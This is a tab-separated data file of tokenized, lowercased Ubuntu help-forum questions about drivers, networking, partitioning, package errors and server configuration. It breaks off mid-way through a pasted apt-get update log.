346907	error with wnframework	when i install wnframwork on ubuntu it ok. but when i delete the folder . of wnframework and copy now to paste in it , it show like this : internal server error the server encountered an internal error or misconfiguration and was unable to complete your request . please contact the server administrator , [ no address given ] and inform them of the time the error occurred , and anything you might have done that may have caused the error . more information about this error may be available in the server error log . show error like this :
346910	sudo password for parallels ?	i 'm having a problem in parallels 8 with ubuntu 12.04 as my guest os . ubuntu asked me for a unix password when i first logged on , and i typed in my desired password . however , any time i try to use a sudo command that requires a password , it does not accept my password . does parallels default this password to something that i 'm unaware of ? i 've read that it has something to do with parallels tools , but i have to use sudo to install the tools . ps : i know this is more of a parallels question , but their support is bad , i figured i would have better luck here .
346913	show *realtime* mouse cursor coordinates ? ( cursor mod / overlay ) also , copy to clipboard ?	i 'm looking for a solution that would display the current mouse cursor coordinates in realtime ( i.e . not xdotool and not xev ) . i need to move the mouse to a certain position , then press alt-tab to flip to another window and record the coordinates there . ( this would not move the mouse , so the coordinate display would stay the same ) . there 's a windows program that works beautifully for this purpose - http : //download.cnet.com/cursor-position/3000-2383_4-75449858.html ? tag=mncol ; 1 ... but it does n't even start up in wine . alternately , instead of displaying the coordinates , if this solution could copy the coordinates ( in xxx , yyy format ) to the clipboard , upon pressing a hotkey , that would be even better . any suggestions would be much appreciated ! p.s . i 'm running ubuntu 12.04 lts .
346914	download ubuntu	my download must be resized my disc is 700mb and it states not enough room , could someone please tell me what size disc i need .
346919	does anyone have drivers for a tp-link tl-wn823n usb wireless	i have installed ubuntu 13 on my system and i have been using a tp-link tl-wnb23n usb adapter for my wireless on the win8 side ... they have drivers up at tp-link for win/7/8 but not for linux . does anyone have a clue ?
346920	not sure i set my host name right need someone to straighten me out	i just installed zimbra and i think i screwed up my host name trying to get it to install . i did get zimbra installed but the certificate is not working . ( that 's another topic ) here is my host file : 127.0.0.1 localhost 127.0.1.1 greenhornet xxx.xxx.xxx.85 mydomain.co greenhornet xxx.xxx.xxx.85 mydomain.co greenhornet xxx.xxx.xxx.85 webmail.mydomain.co greenhornet # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters of course the ip and domain name was changed . and this is my hostname file : mydomain.co i wanted the servername to be greenhornet but i changed it for the install . also , i have the ip pointing to the server and that works fine but i was n't sure if i did the host file correctly . is the host file right ? should i change the hostname file back to greenhornet ? any help would be greatly appreciated !
346922	how do i modify grub to load my hdmi driver before stage 2 is loaded ?	i dropped my laptop a few weeks ago and broke the screen . the machine itself is still usable i just need to use my tv as a pc monitor . however , the tv currently will not load until after grub stage 2 is completed . this prevents me from booting from disk , selecting the os i want to boot into , and all kinds of other fun stuff . doe 's anyone know where i can a ) find the name of the exact device driver or module that loads my hdmi port and b ) modify the grub.conf file such that i can load the hdmi driver before stage 2 ? also , if there is an easier way to do this please let me know : )
346923	what is the ttyl and how can i go back to work ?	i run 12.04 lts and i just experienced a ttyl . i had to look up some texts to reboot my pc from the command line . it happened after spotify froze . is there a way to avoid this ? or is my system failing ?
346924	timed shutdown - shutdown after 30 minutes	i am running xubuntu 13.04 , i got in the habbit of closing my acer netbook and forgetting about it for a week+ . i open it up to find it has still been running . how do i set it to shutdown after 15 minutes of inactivity ? i do n't want to set it to lid close because i often get up and close the lid so kids do n't get at it . also , due to the sometimes long stretches i go without touching it , i would like to make sure it is completely shutdown . i 'm sure i 'm just missing some little check box . i 've never had a setup that did n't shut itself down , or was n't able to with a few click . i already googled the question for a bit and was n't able to get the keywords right to get a relevant answer .
346926	how do i fix the ubuntu software center with gstreamer0.10-plugins-bad ?	i ca n't update files or get new files . i think the problem is gstreamer0.10-plugins-bad . here 's the message i get in ubuntu software center : '' new software ca n't be installed , because there is a prolem with the software currently installed . do you want to repair this problem now ? '' i then i go in a loop when it asks to `` repair , '' i say yes with authentication , and then it says `` requires installation of untrusted packages . this requires installing packages from unauthenticated sources . '' if i hit `` ok , '' i go in the loop , starting with `` new software ca n't be installed ... . '' if i hit `` repair , '' i get the same selections again : `` ok '' and `` repair . '' when i click on `` details '' it just says gstreamer0.10-plugins-bad . what do i do ? i 've looked on the web and tried some sudo apt get type commands . nothing works . thanks , van
346927	dual os and partitioning	i have a 150 gig hard drive with ubuntu 12.10 currently installed what i want to do is format the hard disk and make three separate partitions . a 30 gig partition for windows 7 , a 4 gig partition for ubuntu 10.10 and the rest for my files . my concern was how to do this and if it were possible ? and will i be able to access my files when i booted either os
346929	installing windows 7 , ubuntu 12.04 and fedora 18 ( 19 ) in triple boot with swap and files space in hdd	i 'm new ... but , i want you to help me ... i want a triple-boot , windows 7 , ubuntu 12.04 and fedora 18.. or 19 ... and i found this post ( question ... ( ? ) how do i triple-boot ubuntu , fedora and windows 7 ? and it is great , but i think it would be better if i dedicate some space to the swap ... i have a 1tb hdd ... so , here is my plan : i want 200gb for windows 7 , another 200gb for ubuntu 12.04 , other 200gb for fedora 18 ( or 19 , whichever is more stable ) and the other 400gb -pay attention- to use as my files space ... i mean , use those 400gb to save my files , music , images and so i can use them in any of the 3 o.s . do you follow me ? ... so , when i play games in windows i can see my photos of the last christmas , and when i 'm working on ubuntu y can see the same photos of the last christmas , and when experimenting with fedora ( 18 or 19 lol ) i can see the same photos of the last christmas . but i want to tell me that if it is a good idea to give some space to the swap ... i read in the same link ( how do i triple-boot ubuntu , fedora and windows 7 ? ) at the end that it is possible to have the same swap for ubuntu and fedora , but i do n't really understand because i understood that it is convenient to have the double swap space of your ram memory , i mean , i have 4 gb of ram , so , it is recommendable to have 8gb in swap ... so , are 2 things : 1 - the partition of my hdd to work fine with the 3 o.s and the space for my files . 2 â the specifications for the swap memory ... i want to accentuate that the space its not a problem , remember that i have a 1tb hdd , so i can give a lot to the swap , but i do n't really know how much it is correct , maybe if i give it a lot of space it would be an error and the system ( s ) crash ... i dunno . so , please help me ... i 'm very eager to install them.. all the 3 s.o .
346930	rsync time for update with deletes	i 've been messing with rsync to push my music library ( managed by banshee ) to my sdcard , which i use for my phone . this helps me get around the fact that i do n't have a good gui program to sync music back and forth from my phone . while i always hated itunes , i 'll admit , it was great at managing music and other files stored in the program between an external device and the pc . i do n't claim that rsync is n't an amazing utility , i know it is , i 'm just not as skilled with it as i hoped to be . going through the man page a couple of times i came up with the following 2 scripts : synctosdcard.sh : # ! /bin/bash exec > > ( tee ~/rsync.out ) ; exec 2 > > ( tee ~/rsync.err ) ; rsync -v -r -- delete-delay /home/user/music/ /media/user/0741-c987/music/ ; updatesdcardonly.sh # ! /bin/bash exec > > ( tee ~/rsync.out ) ; exec 2 > > ( tee ~/rsync.err ) ; rsync -v -r -u -- inplace -m -- prune-empty-dirs -e -- delete /home/user/music/ /media/user/0741-c987/music/ ; my goal is to both update the directory on the sdcard with the contents of the directory on my machine , and clean anything that has been moved or removed from the source directory . the first rsync script ( synctosdcard.sh ) does this ; however , it takes a long time to run . the second rsync script , while it contains the delete option only pushes changes from my local machine ( new files and updated files ) to the sdcard ; this script is extremely fast though . what i 'm looking for is someone who can help me merge the 2 together , to get a fast update with deletion of files that no longer exist on the source ( pc ) as they do on the target ( sdcard ) . can someone please help me with this ? i 'm also open to alternative ways of achieving the same goal if possible ; rsync is just the best utility i can think of for this kind of operation . thanks .
346931	getting d-link dwa 160 b2 working	i have a usb wireless adapter and it does n't seem to be working on ubuntu . i first tried it on 13.04 following this guide , but to no avail . i then proceeded to try it on 12.04 lts , but i ca n't seem to even get build-essential installed . it 's really hard to get all the packages onto the ubuntu system due to not having an internet connection while using it , and even when i got what i thought was everything i needed , i just kept getting a plethora of errors . following that , i tried to do it with ndiswrapper , but sudo modprobe says there 's no ndiswrapper module , so i 'm stuck . on 13.04 , it would recognize ndiswrapper , and recognize the device , but it just would n't open a connection .
346936	can not update intellij because of error permission denied ?	my intellij version is 12.1 and new version is 12.1.4 so i want to update it but after dowloading new file it can not proceed because of file permission denied . can any one tell me how to change permission so i can update my intellij ?
346939	intel imac hd with no image ... how do i get ubuntu to work ?	i just replaced my 27 '' intel imac ( late 2009 ) hd . it has no os on it ( wd blue 1tb ) . do i need to download a certain version of ubuntu onto my pendrive ? do i need a windows or mac os to install ubuntu ? i do n't want dual boot , i only want ubuntu . i 've seen the light , i just do n't know where i 'm going now that i 'm there ... it 's too bright ! thanks guys , i appreciate it .
346940	sharing between ubuntu and mac - argh , help !	i have setup a ubuntu server on an old hp computer . i am trying to use it as a file and print server for two mac books . the print server i have work ( hurray ! ) , but the file server is giving me a headache . so ... i am a complete ubuntu/linux noob , but have been reading furiously . i have setup a shared folder ( via samba ) called primary share drive ( psd ) on an external hdd on the ubuntu machine . the mac can see the shared folder , but when i click the folder it says `` the operation can’t be completed because the original item for “primary share drive” can’t be found . '' i have created a different folder on the internal hdd and it works . i can see it and open it . so , the only difference that i can see is that if i go to permission tab right click menu of the psd folder , it does n't allow me to change the group and others folder and files access permissions ; it just defaults it back to none . i have set the share tab to share the folder . any help/insight would be amazing !
346941	automatically mounting multiple ecryptfs directories	what i 'm thinking of is having users `` husband '' and `` wife '' , each with ecryptfs home directories , along with an ecryptfs-encrypted /home/husbandandwife directory that each user has access to . i 'd like /home/husbandandwife to be mounted automatically when either user logs on . i have n't seen anyone discussing this use case . is it possible ?
346944	proftpd - ( login failed ) : invalid shell : '/dev/null '	i 'm using proftpd . when i try to log into the the ftp server it gives me the below message in the log : user err ( login failed ) : invalid shell : '/dev/null' many searches reveal that i should set requirevalidshell to off which i did , then i got this error in the log : err chdir ( `` /dev/null '' ) : not a directory i also tried to set my shell access to '/dev/false ' and that did n't change anything . client side , it says the login failed . i 'm not sure what to do anymore , i spent about 4 hours trying to figure it out . could really use some help . here is my proftpd.conf : include /etc/proftpd/modules.conf useipv6 on identlookups off servername `` 192.168.0.100 '' servertype standalone requirevalidshell off deferwelcome off multilinerfc2228 on defaultserver on showsymlinks on timeoutnotransfer 600 timeoutstalled 600 timeoutidle 600 displaylogin welcome.msg displaychdir .message true listoptions `` -l '' denyfilter \* . */ port 21 < ifmodule mod_dynmasq.c > < /ifmodule > maxinstances 3 user proftpd group nogroup umask 022 022 allowoverwrite on transferlog /var/log/proftpd/xferlog systemlog /var/log/proftpd/proftpd.log < ifmodule mod_quotatab.c > quotaengine off < /ifmodule > < ifmodule mod_ratio.c > ratios off < /ifmodule > < ifmodule mod_delay.c > delayengine on < /ifmodule > < ifmodule mod_ctrls.c > controlsengine off controlsmaxclients 2 controlslog /var/log/proftpd/controls.log controlsinterval 5 controlssocket /var/run/proftpd/proftpd.sock < /ifmodule > < ifmodule mod_ctrls_admin.c > admincontrolsengine off < /ifmodule > include /etc/proftpd/conf.d/ proftpd-1.3.4a xubuntu 12.10
346947	logitech k750 stops working after booting	my logitech k750 can work while configuring the bios during boot but once i boot into ubuntu 12.04 i get no response . running lsusb on a second keyboard shows both my logitech keyboard and mouse are connected but they wo n't respond . any ideas ? i searched and did n't find anything like this . update : i found some cases where the logitech unifying receiver fails to respond and is fixed by running the following command : modprobe -r hid_logitech_dj & & modprobe hid_logitech_dj . i attempted this but the problems persists .
346950	wifi works only after restart if wirless is disabled and enabled	i have a lan cable with internet connection and wifi . when i connect to lan i disable wireless connections so that both are not connected at the same time . but when i remove the lan cable and try to connect to wifi it does not work and i have to restart the computer inorder for it to work . any idea how to fix this ?
346952	how to open the network manager ?	can tell me how to open network manager in ubuntu 12.04 . it is a default package in ubuntu os , or we need to download it ?
346953	how to read and use crash reports ?	a small independent application is crashing on my system ( kubuntu 12.04 ) . i want to manually review the info in the crash report and then email the relevant parts to the developer . the file is located in /var/crash/_usr_bin_appname.1000.crash however i am not sure which tool i need in order to read , edit and save the crash report in a form that i can email to the developer .
346954	ubuntu welcome screen freezing after graphic driver update	hey guys i installed a geforce gtx200 graphic card on my ubuntu 13.04 computer . after downloading the drivers and installing them i can now see the ubuntu welcome screen but it does nothing after that point . i can see the ubuntu logo and the progress bar finishes loading but then it all stops . i had the nvidia-304 drivers installed with the previous card . when i changed to the new card i uninstalled them and installed the new drivers . if i go into recovery mode - > root console and then execute startx , i can see the desktop , but it does not work any other way . any ideas of what can i do next ? thank you !
346958	amd driver disables desktop effects	i installed the amd driver for my radeon 6700 and i can no longer enable any desktop effects . the driver works fine for 3d rendering ( via desura or steam ) . the non-proprietary driver works fine for desktop effects . preferably i 'd like to have both ( 3d games and desktop effects ) . is there a way to get both working/fix the problem with the amd drivers ?
346960	ubuntu packaging : why separate for 32-bit and 64-bit	why we have to do separate packaging to applications for 32-bit and 64-bit ubuntu operating systems.i mean why some applications are making 32-bit and 64-bit separately and why some applications are not ? is there any advantage if we made 64-bit packaging for a 64-bit os ?
346964	project/work based desktop customization	i would like to create customized desktops which contain the files and program/tool icons etc that i use for specific projects . i would also like to switch between different projects like i do when changes workspace . is this possible ? if so how ? zack
346967	installing ubuntu on android device ( htc desire hd )	i want to install ubuntu on my android device . details of my handset as below ; htc desire hd - a9191 | 768 mb ram | chipset - qualcomm msm8255 snapdragon | cpu - 1 ghz scorpion | gpu - adreno 205 where can i find and install ubuntu os for my htc desire hd ? please advise .
346969	pure ftp symlink does n't work from ipod touch	i am using ubuntu 12.04 lts with pure-ftpd installed , configured and running . i can follow a symlink on ubuntu 12.04 , windows ( xp , 7 , 8 ) and even on an old mac ( os 9 i think ) but it does n't work on ipod touch . any ideas on an alternate method of doing this ( without a symlink ) ? for example : would mapping a virtual path work ? i 'm not sure how its done but something like alternate lines starting with virtual path followed by actual path .
346971	ubuntu 12.10 startup error : render error detected	on start up my system shows render error detected due to which i am unable to connect wireless lan . please help me .
346972	how to get rhythmbox sorting asian names correctly	rhythmbox can not sort asian ( japanese in my case ) names correctly . is there a way to make it work ? i can not post images , so i can not post evidence : - ( thanks .
346975	can upstart script be triggered by a device attached ?	how should i specify the `` start on '' condition to run an upstart script when a device ( an external disk ) is attached ?
346980	what is commands to create debian comapt file	i want to make my application as package in ubuntu , so i created tar.gz and now i going to create debian files , i got command for creating changelog file , but do n't know how to create compat , control , install , rules source through terminal.. whats the syntax i follow.. ? i use this code for creating first file called changelog file # dch -- create -v 1.0-1 -- package myapp and , i want to know other files ( compat , control , install , rules source ) creation syntax..
346988	radeon hd 7990 in ubuntu 12.04 and above	i suppose this is a simple question ... will a radeon hd 7990 dual gpu card work properly in ubuntu 12.04 and above ? i 've tried searching the net to no avail unfortunately . the price of the top of the line card has dropped considerably where it is worth looking at especially with steam games getting better by the month . will crossfire on this card work ?
346990	slowing issue after updating ubuntu 13.04	i am a new user in ubuntu . after update , my ubuntu response slowly and also slowly . the updating size around 225 mb . what can be the cause of it ?
346991	juju gui public ip	i have been trying to install juju with juju-gui on my virtual machine ( fresh installation ubuntu 13.04 64-bit ) to configure my local environment i installed mongodb-server and lxc . after successfully installing juju and juju-gui , i run watch juju status and get public ip : 10.0.3.213 for juju-gui . since i am running server version of ubuntu i have no way of seeing that url from this virtual machine . using my host os i ca n't reach that ip since that ip is being used by lxc . is this a default way of accessing juju ? if i remove lxc would i be able to access gui on eth0 ip address ?
346992	conflicting shortcuts in unity	i 'm used from windows to press alt+up to navigate to the parent folder in the file explorer . when i do this in the unity file manager , it moves up but it also opens the hud , stealing focus from the file manager . is there a different shortcut for the navigation or another workaround ?
346995	byobu status bar keeps loading after install	i have just installed byobu . when i start it the status bar keeps loading ? any idea of what to do ?
346996	adding new nameserver and keeping local sites access	at my job the only nameserver in /etc/resolv.conf points to 127.0.1.1 . i added an opendns on top of it , although that made me lose the access to the companyâs local sites . how do i keep the opendns address for accessing everything outside , but keep the 127.0.1.1 to point to the company 's local sites ?
346997	failed to install ubuntu	i have a problem whereby when i tried to install ubuntu with my usb pendrive , my laptop crashes whenever i choose the install option . my dvd reader is broken therefore my last resort is to use usb port using thumbdrive/pendrive , i have followed all the instructions to make a usb bootable from matching the m5dsum , making the pendrive fat32 and even making the usb as 1st priority to boot.buy as i mentioned , my laptop still crashes . i tried to install mint as i thought ubuntu is somehow flawed , but the result is the same . i tried to change the usb port , still crashing . anyone could help me ? my system is windows 7 , nvidia geforce gtx460m , core i7-820q , 4gb ddr3 ram . there is no overheating problem as i have already cleaned my fans and applied a new thermal paste . i now suspect my graphic card instead , so far , my memory test and hdd test is ok .
347002	making a gui for python program	i want to make a gui for a program written in python.it is said that gnome tool kit is helpful for this task.but , i want to know how to install it ? and the way i should use it ? i am using ubuntu 12.04 64-bit and using unity environment.python version is 3.2
347004	keyboard cursor invisible in libreoffice and abiword	i 'm using ubuntu with xfce , and today a strange problem appeared : the `` keyboard cursor '' ( the blinking vertical line showing the place where your typing will appear in text ) has completely disappeared . this happens in libreoffice writer and abiword , but the cursor is still seen in text boxes in web , search box , in renaming files etc . the cursor can also seen when editing source files in rstudio . i can still write the text but have to guess where it appears which is obviously making it virtually impossible to edit a document of any reasonable length . thanks in advance for any suggestions . kenn
347008	can any one recommend me free stock market software ?	i have tried to install qtstalker , grism . but it is not available in my ubuntu software center.i guess it is not available on ubuntu 13.04 . can anyone recommend me free software for 'technical analysis ' of stocks , which is available for ubuntu 13.04 ?
347012	'no bootable device found '	i 'm new with linux . i used pendrivelinux 's universal usb installer to download , & install ubuntu-12.10-desktop-i386 on a spare old sandisc usb thumb-drive . everything went smoothly , until i tried to boot it onto my old acer desktop . after pressing f12 , i made sure 'removable ' was at the top of the list , but when i press 'enter' it says 'no bootable device found ' . what am i supposed to do ? ? ? thanks , jkb
347013	retrieve password from thunderbird 17	i 'm using t-bird 17.0.8 . i need to retrieve the password thunderbird is using to connect to my email account because i have forgotten it . this link seems to explain the solution , but that 's for an older version of thunderbird and i ca n't find the 'option ' link in the 'tools ' menu no more .
347021	lock var lib folder	hi i installed a program ant between install it disconnected from internet and when i want to install program i can not and give this error what shoud i do ? could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable )
347022	clear dash searchbox after search and start a program	if top left enters a search term in the search box dash , eg `` fir '' is then for example firefox displayed . all well and good , how can you adjust the one that deletes the dash search the word `` fir '' to start the program . so next time look for the input box is `` empty '' . i am aware that the box empties automatically when you re-enter a word . but that 's what i do not want the field should be empty . can this be set somewhere so that open the input field is empty after the next ? thank you sorry for my bad english , i 'm a german user
347023	how do i transfer .db files from android phones to ubuntu system ?	how do i transfer .db files from android phones to ubuntu system ? i have created a application which stores data in sqlite . now i have to view that .db file in the system .
347025	installed google chrome beta but it shows stable version	first i uninstalled chrome using below command sudo apt-get remove google-chrome-stable then i installed chrome beta on ubuntu 12.04 using below command sudo apt-get install google-chrome-beta it was successful installation . now when i search for chrome i see my old stable version . what 's wrong here ?
347026	how i can create the ubuntu 12.04 live image using my custom kernel ?	i want to install the ubuntu on emmc but in 12.04 ubuntu installer in not detecting the emmc . might be emmc driver is not there . i ahve a custom kernel drm-intel in which i am able to check that emmc . i want to replace that kernel with 12.04 live ubuntu 's kernel . i folowed the steps from following links https : //help.ubuntu.com/community/livecdcustomization but i am getting the error while booting . [ drm : intel_pipe_config_compare ] eror mismatch in clock ( expected 108000 , found 0 ) ( initramfs ) mount : mounting aufs on /root failed : no such device
347033	backing up to two locations at the same time ?	i 'm using deja-dup to create backups of my documents , but it wo n't let me backup to two places at once . the backup button is greyed out . is there any way to do this ?
347038	error : cppuhelper/implbase4.hxx : no such file or directory	when i was going to test the example ( rng ) which provided in `` calc/add-in/simple calc add-in '' tutorial in apache open office wiki i got the error `` cppuhelper/implbase4.hxx : no such file or directory '' while exucuting make file . can you give a solution for this problem ?
347040	why does resolvconf change a domain to a search keyword ?	i am trying to get a domain xxx.yy into the /etc/resolv.conf . before , there are only nameserver entries . i add the domain to the previously empty /etc/resolvconf/resolv.conf.d/base . after running resolvconf -u , /etc/resolv.conf contains a search xxx.yy instead of the domain xxx.yy . why does this happen ?
347047	dell c1100 server and latest version	is the latest server version 13.04 suitable for my dell c1100 server . currently running ubuntu 10.04.4 64-bit ? cheers guys .
347048	running mongovue using wine	i am getting error dialog invalid parameter after clicking okay button there is no windows program configured to open this type of file please someone link me portable link for mongovue and instruction to run it on ubuntu 13.x
347049	can not connect to specific wi-fi network	i was able to connect to my work wi-fi network normally without any issues . suddenly after i have rebooted my laptop i was unable to join this specific network . i can connect to every other network and i can even connect to the company 2nd wi-fi network that has routers under the same manufacturer . i am able to connect to this network using different devices . is there any possibility that my my mac address is banned from the router ? my wi-fi icon just blinks and then drops the connection without any message . i am using ubuntu 12.04 . what can have caused that issue ?
347052	install oa win7 in a virtualbox	i bought an asus , which ( unfortunately ) came with win7 . i never accepted licence and erased immediately everything with lubuntu . now i 'd like to install windows on a virtualbox ( to use itunes , such a pity ... ) , and i 'd like to finally use my licence key ( which i could not get reimbursed ... too complicated ... ) . so the first thing i need to do is to download the proper iso . my licence key says window 7 64bits home premium edition oa for asus . would any win 7 64bits home premium edition do , or do i need to find the specific oa for asus version ? i read oa means it 's hardware specific . will it work on the same device , but in the virtualbox instead of straight install ? these licence restrictions are so bad ...
347054	installing gnome 3 on xubuntu 12.04 ?	i have a few questions about this . i have xubuntu 12.04 installed , using the default xfce , but i really like the look of gnome 3 . however , i always see people complaining about it . would installing it on xubuntu 12.04 be as simple as `sudo apt-get install gnome-shell or is it a different command , or what ? also , how stable is it ? it looks really , really pretty , and i want to try it , but i do n't want to end up screwing up my laptop.`
347056	no internet connection on ubuntu server 12.04 lts	i have an ubuntu server and i can not get internet connection over this . the ip , subnet , gateway and the 2 dns servers that i have been given is standard addresses that i must put into . i will give details of this : 1 ) ping 8.8.8.8 returns network is unreachable 2 ) sudo nano /etc/network/interfaces is set to # the loopback network interface auto lo iface lo inet loopback # the primary network interface # auto eth0 < -- this is a comment iface eth0 inet static address `` my_static_ip_here '' netmask 255.255.255.0 gateway `` my_gateway_here '' 3 ) sudo nano /etc/resolve.conf is set to nameserver `` my_dns_server_1_here '' nameserver `` my_dns_server_2_here '' finally , ifconfig returns 127.0.0.1 address and a subnet 255.0.0.0 ofcourse on lo i can not give detailed ifconfig here because of the limitations that i got . ps : this is a virtual machine that i am using . ps2 : i tried to auto-dhcp it with iface eth0 inet dhcp but during the networking restart it kept loading and loading forever , so that does not work and i want to give this static ip .
347063	list all installed desktop environments in ubuntu	i am using ubuntu 13.04 and i have installed many desktops environments to try them . now i want to know is there any way i can list all the installed desktop environments from the command line tool .
347064	software center not working in ubuntu 12.04 lts	i am having trouble with the software center in ubuntu 12.04 . when i write software-center in terminal , this says : ** ( software-center:3203 ) : warning ** : failed to load shared library 'libwebkitgtk-3.0.so.0 ' referenced by the typelib : libwebkitgtk-3.0.soso : no se puede abrir el archivo del objeto compartido : no existe el archivo o el directorio traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 131 , in < module > session = webkit.get_default_session ( ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) gi._glib.gerror : could not locate webkit_get_default_session : `webkit_get_default_session ' : /usr/lib/libjavascriptcoregtk-3.0.so.0 : undefined symbol : webkit_get_default_session how to solve this ? please help .
347065	error : the ext4 file system creation in partition # 1 of scsi 1 0,0,0 sda failed	i keep getting the error message `` the ext4 file system creation in partition # 1 of scsi 1 0,0,0 sda failed '' when trying to install from a usb flash drive . my hard drive is brand new and is totally blank so no other o/s . i have tried several different o/s like linux mint , jolicloud and seem to get the same problem but would prefer ubuntu 12.04 . i see a few other people have made the same problem but ca n't find a solution . i have tried to manually do the partitions and also have allowed the installation to sort them but same result every time . please help .
347068	cant install kdenlive on ubuntu 13.04	i had kdenlive working on my ubuntu 12.04 , the only problem was that i could n't hear the audio on the movies i edited . so i upgraded to ubuntu 13.04 , and the same problem was . so i uninstalled kdenlive , thinking that the problem will disappear when ill reinstall kdenlive . then when i tried to install kdenlive the following error appeared : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : kdenlive : predepends : dpkg ( > = 1.15.6~ ) but 1.16.10ubuntu1 is to be installed depends : libc6 ( > = 2.15 ) but 2.17-0ubuntu5 is to be installed depends : libkdecore5 ( > = 4:4.4.95 ) but 4:4.10.5-0ubuntu0.1 is to be installed depends : libkdeui5 ( > = 4:4.8.80 ) but 4:4.10.5-0ubuntu0.1 is to be installed depends : libkio5 ( > = 4:4.7.0 ) but 4:4.10.5-0ubuntu0.1 is to be installed depends : libknewstuff3-4 ( > = 4:4.4.0 ) but 4:4.10.5-0ubuntu0.1 is to be installed depends : libknotifyconfig4 ( > = 4:4.3.4 ) but 4:4.10.5-0ubuntu0.1 is to be installed depends : libnepomuk4 ( > = 4:4.5.85 ) but 4:4.10.5-0ubuntu0.1 is to be installed depends : libqt4-dbus ( > = 4:4.5.3 ) but 4:4.8.4+dfsg-0ubuntu9.4 is to be installed depends : libqt4-opengl ( > = 4:4.5.3 ) but 4:4.8.4+dfsg-0ubuntu9.4 is to be installed depends : libqt4-script ( > = 4:4.6.1 ) but 4:4.8.4+dfsg-0ubuntu9.4 is to be installed depends : libqt4-svg ( > = 4:4.5.3 ) but 4:4.8.4+dfsg-0ubuntu9.4 is to be installed depends : libqt4-xml ( > = 4:4.5.3 ) but 4:4.8.4+dfsg-0ubuntu9.4 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.4+dfsg-0ubuntu9.4 is to be installed depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.8.4+dfsg-0ubuntu9.4 is to be installed depends : libsolid4 ( > = 4:4.3.4 ) but 4:4.10.5-0ubuntu0.1 is to be installed depends : libstdc++6 ( > = 4.4.0 ) but 4.7.3-1ubuntu1 is to be installed depends : kdenlive-data ( = 0.9.4-1ubuntu1 ) but 0.9.5+git20130311.2ab823a1-0ubuntu0~sunab~precise1 is to be installed help ? ? edit : i 've been asked to post the output for apt-cache policy kdenlive : tor @ tor-office : /home2/tor $ sudo apt-cache policy kdenlive [ sudo ] password for tor : kdenlive : installed : ( none ) candidate : 0.9.4-1ubuntu1 version table : 0.9.5+git20130311.2ab823a1-0ubuntu0~sunab~precise1 0 100 /var/lib/dpkg/status 0.9.4-1ubuntu1 0 500 http : //ubuntu.cica.es/ubuntu/ raring/universe amd64 packages edit : when i tried `` sudo apt-get update '' after renaming as braiam suggested i got this : tor @ tor-office : /home2/tor $ sudo rename 's/\.list $ /\.list\.disable/ ' /etc/apt/sources.list.d/*.list [ sudo ] password for tor : tor @ tor-office : /home2/tor $ sudo apt-get update hit http : //archive.ubuntu.com raring release.gpg get:1 http : //security.ubuntu.com raring-security release.gpg [ 933 b ] get:2 http : //extras.ubuntu.com raring release.gpg [ 72 b ] hit http : //archive.canonical.com lucid release.gpg get:3 http : //archive.ubuntu.com raring-updates release.gpg [ 933 b ] hit http : //ubuntu.cica.es raring release.gpg get:4 http : //security.ubuntu.com raring-security release [ 40.8 kb ] hit http : //extras.ubuntu.com raring release hit http : //archive.ubuntu.com raring release hit http : //archive.canonical.com lucid release get:5 http : //ubuntu.cica.es raring-updates release.gpg [ 933 b ] get:6 http : //archive.ubuntu.com raring-updates release [ 40.8 kb ] hit http : //extras.ubuntu.com raring/main sources hit http : //archive.canonical.com lucid/partner sources hit http : //ubuntu.cica.es raring-backports release.gpg hit http : //extras.ubuntu.com raring/main amd64 packages get:7 http : //ubuntu.cica.es raring-security release.gpg [ 933 b ] hit http : //extras.ubuntu.com raring/main i386 packages get:8 http : //security.ubuntu.com raring-security/main amd64 packages [ 110 kb ] hit http : //archive.ubuntu.com raring/main amd64 packages hit http : //ubuntu.cica.es raring release hit http : //archive.ubuntu.com raring/restricted amd64 packages get:9 http : //ubuntu.cica.es raring-updates release [ 40.8 kb ] hit http : //archive.ubuntu.com raring/main i386 packages hit http : //archive.ubuntu.com raring/restricted i386 packages hit http : //archive.ubuntu.com raring/main translation-en get:10 http : //security.ubuntu.com raring-security/restricted amd64 packages [ 14 b ] get:11 http : //security.ubuntu.com raring-security/main i386 packages [ 109 kb ] hit http : //ubuntu.cica.es raring-backports release hit http : //archive.ubuntu.com raring/restricted translation-en get:12 http : //archive.ubuntu.com raring-updates/main amd64 packages [ 176 kb ] get:13 http : //ubuntu.cica.es raring-security release [ 40.8 kb ] ign http : //extras.ubuntu.com raring/main translation-en_us ign http : //extras.ubuntu.com raring/main translation-en get:14 http : //security.ubuntu.com raring-security/restricted i386 packages [ 14 b ] hit http : //ubuntu.cica.es raring/main sources hit http : //ubuntu.cica.es raring/restricted sources get:15 http : //security.ubuntu.com raring-security/main translation-en [ 56.5 kb ] hit http : //ubuntu.cica.es raring/universe sources get:16 http : //archive.ubuntu.com raring-updates/restricted amd64 packages [ 14 b ] hit http : //ubuntu.cica.es raring/multiverse sources get:17 http : //archive.ubuntu.com raring-updates/main i386 packages [ 174 kb ] hit http : //ubuntu.cica.es raring/main amd64 packages hit http : //security.ubuntu.com raring-security/restricted translation-en hit http : //ubuntu.cica.es raring/restricted amd64 packages hit http : //ubuntu.cica.es raring/universe amd64 packages hit http : //ubuntu.cica.es raring/multiverse amd64 packages hit http : //ubuntu.cica.es raring/main i386 packages hit http : //ubuntu.cica.es raring/restricted i386 packages get:18 http : //archive.ubuntu.com raring-updates/restricted i386 packages [ 14 b ] hit http : //ubuntu.cica.es raring/universe i386 packages hit http : //ubuntu.cica.es raring/multiverse i386 packages ign http : //security.ubuntu.com raring-security/main translation-en_us get:19 http : //archive.ubuntu.com raring-updates/main translation-en [ 83.1 kb ] ign http : //security.ubuntu.com raring-security/restricted translation-en_us hit http : //ubuntu.cica.es raring/main translation-en hit http : //ubuntu.cica.es raring/multiverse translation-en hit http : //archive.ubuntu.com raring-updates/restricted translation-en hit http : //ubuntu.cica.es raring/restricted translation-en hit http : //ubuntu.cica.es raring/universe translation-en get:20 http : 